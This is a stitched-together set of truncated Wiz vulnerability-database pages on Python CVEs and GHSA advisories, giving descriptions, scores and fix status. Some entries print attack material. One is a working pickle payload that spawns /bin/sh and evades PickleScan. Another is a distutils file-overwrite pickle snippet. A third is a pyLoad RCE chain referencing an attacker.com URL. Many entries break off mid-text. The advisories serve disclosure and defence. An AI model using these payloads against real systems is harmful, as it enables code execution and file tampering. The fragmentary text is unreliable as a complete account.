CVE-2026-24130 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-24130 [LOW] CVE-2026-24130 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24130 :
Python vulnerability analysis and mitigation
Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.
Source : NVD
## 2.7
Score
Published January 22, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitatio
Wiz
CVE-2026-27628 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.2
CVE-2026-27628 [LOW] CVE-2026-27628 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27628 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.2, an attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This requires reading the file. This has been fixed in pypdf 6.7.2. As a workaround, one may apply the patch manually.
Source : NVD
## 1.2
Score
Published February 25, 2026
Severity LOW
CNA Score 1.2
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
open-webui
pypdf
Sources
NVD
Chainguard Has Fix Added at: Mar 02, 2026
Debian 11 Severity HIGH No Fix
Wiz
La base de datos CVE: inteligencia de vulnerabilidades seleccionada por Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] La base de datos CVE: inteligencia de vulnerabilidades seleccionada por Wiz | Wiz
## Base de datos de vulnerabilidades de Wiz
Un recurso integral para monitorear vulnerabilidades de alto perfil en entornos de nube, diseñado para equipos de seguridad y profesionales de la nube
Observa cómo Wiz detecta vulnerabilidades explotables a través de cargas de trabajo en la nube. Ver demo de 12 minutos
## Explorar por tecnología
## Filtros populares
## Alto perfil
CVE ID
Severidad
Puntuación
Tecnologías
Nombre del componente
Exploit de CISA KEV
Tiene arreglo
Fecha de publicación
CVE-2026-35616
CRITICAL
9.8
FortiClient EMS
cpe:2.3:a:fortinet:forticlient_enterprise_management_server
Sí
Sí
Apr 04, 2026
GHSA-69fq-xp46-6x23
CRITICAL
9.4
N/A
github.com/aquasecurity/trivy
No
Sí
Mar 24, 2026
CVE-2026-3055
CRITICAL
9.3
Citrix ADC VPX
cpe:2.3:a:citrix:nets
Wiz
CVE-2026-32112 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32112 [MEDIUM] CVE-2026-32112 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32112 :
Python vulnerability analysis and mitigation
ha-mcp is a Home Assistant MCP Server. Prior to 7.0.0, the ha-mcp OAuth consent form renders user-controlled parameters via Python f-strings with no HTML escaping. An attacker who can reach the OAuth endpoint and convince the server operator to follow a crafted authorization URL could execute JavaScript in the operator's browser. This affects only users running the beta OAuth mode (ha-mcp-oauth), which is not part of the standard setup and requires explicit configuration. This vulnerability is fixed in 7.0.0.
Source : NVD
## 4.7
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
GHSA-hgrh-qx5j-jfwx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-hgrh-qx5j-jfwx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-hgrh-qx5j-jfwx :
Python vulnerability analysis and mitigation
## Summary
pty
pty.spawn
## Details
pty.spawn
## PoC
Run the following Python code to generate the PoC pickle file.
import pickle
command = b"/bin/sh"
payload = b"".join(
[
pickle.PROTO + pickle.pack("B", 4),
pickle.MARK,
pickle.GLOBAL + b"pty\n" + b"spawn\n",
pickle.EMPTY_LIST,
pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command,
pickle.APPEND,
# Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes
pickle.OBJ,
pickle.STOP,
]
)
with open("dump.pkl", "wb") as f:
f.write(payload)
Run PickleScan on the generated pickle file.
pty.spawn
## Impact
pty.spawn
## Suggested Patch
diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py
index 34a5715.
Wiz
CVE-2025-15506 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-15506 [MEDIUM] CVE-2025-15506 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15506 :
Python vulnerability analysis and mitigation
A vulnerability was found in AcademySoftwareFoundation OpenColorIO up to 2.5.0. This issue affects the function ConvertToRegularExpression of the file src/OpenColorIO/FileRules.cpp. Performing a manipulation results in out-of-bounds read. The attack needs to be approached locally. The exploit has been made public and could be used. The patch is named ebdbb75123c9d5f4643e041314e2bc988a13f20d. To fix this issue, it is recommended to deploy a patch. The fix was added to the 2.5.1 milestone.
Source : NVD
## 4.8
Score
Published January 11, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Expl
Wiz
CVE-2025-45691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-45691 [HIGH] CVE-2025-45691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-45691 :
Python vulnerability analysis and mitigation
An Arbitrary File Read vulnerability exists in the ImageTextPromptValue class in Exploding Gradients RAGAS v0.2.3 to v0.2.14. The vulnerability stems from improper validation and sanitization of URLs supplied in the retrieved_contexts parameter when handling multimodal inputs.
Source : NVD
## 7.5
Score
Published March 5, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ragas
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 08, 2026
## Get a CVE risk assessment
Get a prioritize
Wiz
CVE-2026-21860 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-21860 [MEDIUM] CVE-2026-21860 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21860 :
Python vulnerability analysis and mitigation
Werkzeug is a comprehensive WSGI web application library. Prior to version 3.1.5, Werkzeug's safe_join function allows path segments with Windows device names that have file extensions or trailing spaces. On Windows, there are special device names such as CON, AUX, etc that are implicitly present and readable in every directory. Windows still accepts them with any file extension, such as CON.txt, or trailing spaces such as CON. This issue has been patched in version 3.1.5.
Source : NVD
## 6.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Per
Wiz
CVE-2026-27469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-27469 [MEDIUM] CVE-2026-27469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27469 :
Python vulnerability analysis and mitigation
Isso is a lightweight commenting server written in Python and JavaScript. In commits before 0afbfe0691ee237963e8fb0b2ee01c9e55ca2144, there is a stored Cross-Site Scripting (XSS) vulnerability affecting the website and author comment fields. The website field was HTML-escaped using quote=False, which left single and double quotes unescaped. Since the frontend inserts the website value directly into a single-quoted href attribute via string concatenation, a single quote in the URL breaks out of the attribute context, allowing injection of arbitrary event handlers (e.g. onmouseover, onclick). The same escaping is missing entirely from the user-facing comment edit endpoint (PUT /id/) and the moderation edit endpoint (POST /id/
Wiz
CVE-2026-23833 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-23833 [LOW] CVE-2026-23833 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23833 :
Python vulnerability analysis and mitigation
ptr + field_length > end
components/api/proto.cpp
field_length
Source : NVD
## 1.7
Score
Published January 19, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
esphome
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 21, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 08, 2026
Nix Severity HIGH Has Fix Added at: Mar 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
#
Wiz
CVE-2026-22702 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.5
CVE-2026-22702 [MEDIUM] CVE-2026-22702 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22702 :
Python vulnerability analysis and mitigation
virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1.
Source : NVD
## 4.5
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 4.5
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz
CVE-2026-35464 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-35464 [HIGH] CVE-2026-35464 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35464 :
Python vulnerability analysis and mitigation
## Summary
ADMIN_ONLY_OPTIONS
storage_folder
## Required Privileges
SETTINGS
storage_folder
ADD
## Root Cause
storage_folder
src/pyload/core/api/__init__.py:238-246
os.path.realpath
/tmp/pyLoad/flask/
SESSION_TYPE = "filesystem"
__init__.py:127
FileSystemCache
md5("session:" + session_id)
pickle.load()
## Proven RCE Chain
lscr.io/linuxserver/pyload-ng:latest
/tmp/pyLoad/flask/
realpath
/lsiopy/.../pyload/
/config/
md5(key_prefix + session_id)
session:
http://attacker.com/92912f771df217fb6fbfded6705dd47c
/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c
pyload_session_
__init__.py:128
pickle.load()
## Impact
A non-admin user with SETTINGS + ADD permissions achieves arbitrary code exec
Wiz
CVE-2026-25645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.4
CVE-2026-25645 [MEDIUM] CVE-2026-25645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25645 :
Python vulnerability analysis and mitigation
requests.utils.extract_zipped_paths()
extract_zipped_paths()
TMPDIR
Source : NVD
## 5.5
Score
Published March 25, 2026
Severity MEDIUM
CNA Score 4.4
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
checkov
python3.12-pip-wheel
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
pip Severity MEDIUM Has Fix Added at: Mar 26, 2026
MinimOS Severity MEDIUM Has Fix Added at: Apr 05, 2026
Re
Wiz
GHSA-m273-6v24-x4m4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-m273-6v24-x4m4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-m273-6v24-x4m4 :
Python vulnerability analysis and mitigation
## Summary
Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.
## Details
This is another vulnerability which impacts the downstream user.
By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.
## PoC
import pickle
import distutils.file_util
class FileWriteBypass:
def __reduce__(self):
target_file = "pwned_config.env"
content = ["print('I have overwritten your config')"]
return (di
Wiz
GHSA-vg9h-jx4v-cwx2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-vg9h-jx4v-cwx2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vg9h-jx4v-cwx2 :
Python vulnerability analysis and mitigation
## Summary
debug = False
app.run(debug=...)
## Details
unfurl/app.py:web_app()
debug
config['UNFURL_APP'].get('debug')
UnfurlApp.__init__
app.run(debug=unfurl_debug, ...)
unfurl.ini
debug
"True"
As a result, debug mode is effectively always on and cannot be reliably disabled via config.
## PoC
unfurl.ini
debug = False
[UNFURL_APP]
unfurl_app
python -c 'from unfurl.app import web_app; web_app()'
Debug mode: on
Debugger is active!
security_poc/poc_debug_mode.py --spawn
## PoC Script (inline)
#!/usr/bin/env python3
"""
Unfurl Debug Mode PoC (Corrected)
This PoC demonstrates that Unfurl's Flask debug mode is effectively
**always enabled by default** due to string parsing of the `debug`
config
Wiz
GHSA-955r-262c-33jc Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-955r-262c-33jc Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-955r-262c-33jc :
Python vulnerability analysis and mitigation
## Summary
telnyx
## Exposure Window
4.87.1 (broken)
2026-03-27 03:51
2026-03-27 10:13
6h 22m
4.87.2 (functional)
2026-03-27 04:07
2026-03-27 10:13
6h 6m
Both versions were quarantined by PyPI at 2026-03-27 10:13 UTC. Note: Version 4.87.1 contained a typo that prevented the malware from executing. Only 4.87.2 was fully functional.
## Who Is Affected
You may be affected if:
telnyx
pip install telnyx
telnyx
You pinned to version 4.87.0 or earlier
You installed before March 27, 2026 and did not upgrade
You built from GitHub source (malicious code was never committed to the repository)
## Attack Details
## Root Cause
The attacker obtained the PyPI API token and uploaded malicious packages dire
Wiz
CVE-2026-27156 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-27156 [MEDIUM] CVE-2026-27156 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27156 :
Python vulnerability analysis and mitigation
Element.run_method()
AgGrid.run_grid_method()
EChart.run_chart_method()
eval()
runMethod()
Element.run_method()
Element.get_computed_prop()
json.dumps()
Source : NVD
## 6.1
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nicegui
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 25, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Pyt
Wiz
CVE-2026-33231 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33231 [HIGH] CVE-2026-33231 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33231 :
Python vulnerability analysis and mitigation
nltk.app.wordnet_app
GET /SHUTDOWN%20THE%20SERVER
os._exit(0)
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
open-webui
py3-nltk
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 14 Severity HIGH No Fix Added at: Mar 21, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 21, 2026
Echo Severity HIGH No Fix Added at: Mar 21, 2026
pip Severity HIGH No Fix Added at: Mar 20, 2026
Wolfi Has Fix Added at: Mar
Wiz
CVE-2026-23877 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23877 [MEDIUM] CVE-2026-23877 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23877 :
Python vulnerability analysis and mitigation
list_folders()
/folder/dir-browser
Source : NVD
## 5.3
Score
Published January 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
swingmusic
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
Wiz
CVE-2025-33253 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-33253 [HIGH] CVE-2025-33253 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-33253 :
Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
Source : NVD
## 7.3
Score
Published February 18, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 29.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 21, 2026
Nix Severit
Wiz
CVE-2026-33045 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-33045 [HIGH] CVE-2026-33045 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33045 :
Python vulnerability analysis and mitigation
Home Assistant is open source home automation software that puts local control and privacy first. Starting in version 2025.02 and prior to version 2026.01 the "remaining charge time"-sensor for mobile phones (imported/included from Android Auto it appears) is vulnerable cross-site scripting, similar to CVE-2025-62172. Version 2026.01 fixes the issue.
Source : NVD
## 7.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
home-assistant
homeassistant
Sou
Wiz
CVE-2026-30930 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-30930 [HIGH] CVE-2026-30930 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30930 :
Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1.
Source : NVD
## 8.6
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-24009 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-24009 [HIGH] CVE-2026-24009 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24009 :
Python vulnerability analysis and mitigation
docling_core.types.doc.DoclingDocument.load_from_yaml()
PyYAML
yaml.FullLoader
yaml.SafeLoader
Source : NVD
## 8.1
Score
Published January 22, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.3
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
docling-core
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 23, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Wiz
CVE-2026-34934 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-34934 [CRITICAL] CVE-2026-34934 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34934 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.90, the get_all_user_threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update_thread. When the application loads the thread list, the injected payload executes and grants full database access. This issue has been patched in version 4.5.90.
Source : NVD
## 9.8
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages
Wiz
GHSA-2vhw-q7vh-7xv2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-2vhw-q7vh-7xv2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-2vhw-q7vh-7xv2 :
Python vulnerability analysis and mitigation
## Summary
/ready
openssl_encrypt_server/server.py
## Affected Code
except Exception as e:
return {"status": "not_ready", "reason": str(e)}
## Impact
Database exception messages can leak:
Database hostnames and IP addresses
Connection parameters and port numbers
Driver version information
Potentially database credentials if included in connection string errorsThis information is available to unauthenticated callers.
## Recommended Fix
{"status": "not_ready", "reason": "database unavailable"}
Log the full exception server-side for debugging
## Fix
7aa8787
releases/1.4.x
Source : NVD
## 6.6
Score
Published April 1, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Pub
Wiz
GHSA-9m86-7pmv-2852 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-9m86-7pmv-2852 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9m86-7pmv-2852 :
Python vulnerability analysis and mitigation
## Impact
/ASCIIHexDecode
## Patches
This has been fixed in pypdf==6.7.5 .
## Workarounds
If you cannot upgrade yet, consider applying the changes from PR #3666 .
Source : NVD
## 6.9
Score
Published March 2, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pypdf
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
##
Wiz
CVE-2026-2969 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-2969 [MEDIUM] CVE-2026-2969 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2969 :
Python vulnerability analysis and mitigation
A flaw has been found in datapizza-labs datapizza-ai 0.0.2. Affected is the function ChatPromptTemplate of the file datapizza-ai-core/datapizza/modules/prompt/prompt.py of the component Jinja2 Template Handler. This manipulation of the argument Prompt causes improper neutralization of special elements used in a template engine. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.1
Score
Published February 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
E
Wiz
CVE-2026-33545 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33545 [MEDIUM] CVE-2026-33545 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33545 :
Python vulnerability analysis and mitigation
read_sqlite()
mobsf/MobSF/utils.py
%
sqlite_master
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mobsf
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 25, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publis
Wiz
CVE-2026-39306 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-39306 [HIGH] CVE-2026-39306 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39306 :
Python vulnerability analysis and mitigation
## Summary
.praison
tar.extractall()
../
## Details
The issue is caused by unsafe extraction of tar archive contents during recipe pull.
.praison
manifest.json
../../escape-http.txt
LocalRegistry.publish()
src/praisonai/praisonai/recipe/registry.py:214-287
manifest.json
LocalRegistry.pull()
src/praisonai/praisonai/recipe/registry.py:289-345
recipe_dir = output_dir / name
recipe_dir.mkdir(parents=True, exist_ok=True)
with tarfile.open(bundle_path, "r:gz") as tar:
tar.extractall(recipe_dir)
HttpRegistry.pull()
src/praisonai/praisonai/recipe/registry.py:691-739
recipe_dir = output_dir / name
recipe_dir.mkdir(parents=True, exist_ok=True)
with tarfile.open(bundle_path, "r:gz") as tar:
tar.extractall(recipe_di
Wiz
CVE-2026-33140 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33140 [MEDIUM] CVE-2026-33140 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33140 :
Python vulnerability analysis and mitigation
PySpector is a static analysis security testing (SAST) Framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a stored Cross-Site Scripting (XSS) vulnerability in the HTML report generator. When PySpector scans a Python file containing JavaScript payloads (i.e. inside a string passed to eval() ), the flagged code snippet is interpolated into the HTML report without sanitization. Opening the generated report in a browser causes the embedded JavaScript to execute in the browser's local file context. This issue has been patched in version 0.1.7.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has P
Wiz
CVE-2026-31815 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31815 [MEDIUM] CVE-2026-31815 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31815 :
Python vulnerability analysis and mitigation
Unicorn adds modern reactive component functionality to your Django templates. Prior to 0.67.0, component state manipulation is possible in django-unicorn due to missing access control checks during property updates and method calls. An attacker can bypass the intended _is_public protection to modify internal attributes such as template_name or trigger protected methods. This vulnerability is fixed in 0.67.0.
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.6
Exploitation Probability (EPSS) 0.1
Affecte
Wiz
CVE-2026-35052 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35052 [MEDIUM] CVE-2026-35052 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35052 :
Python vulnerability analysis and mitigation
D-Tale is the combination of a Flask back-end and a React front-end to view & analyze Pandas data structures. Prior to 3.22.0, users hosting D-Tale publicly while using a redis or shelf storage layer could be vulnerable to remote code execution allowing attackers to run malicious code on the server. This vulnerability is fixed in 3.22.0.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.5
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
dtale
Sources
NVD
pip Severity MEDIUM Has Fix Added a
Wiz
CVE-2026-32609 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32609 [HIGH] CVE-2026-32609 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32609 :
Python vulnerability analysis and mitigation
/api/v4/config
as_dict_secure()
/api/v4/args
/api/v4/args/{item}
vars(self.args)
--password
Source : NVD
## 7.5
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.5
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
glances
Sources
NVD
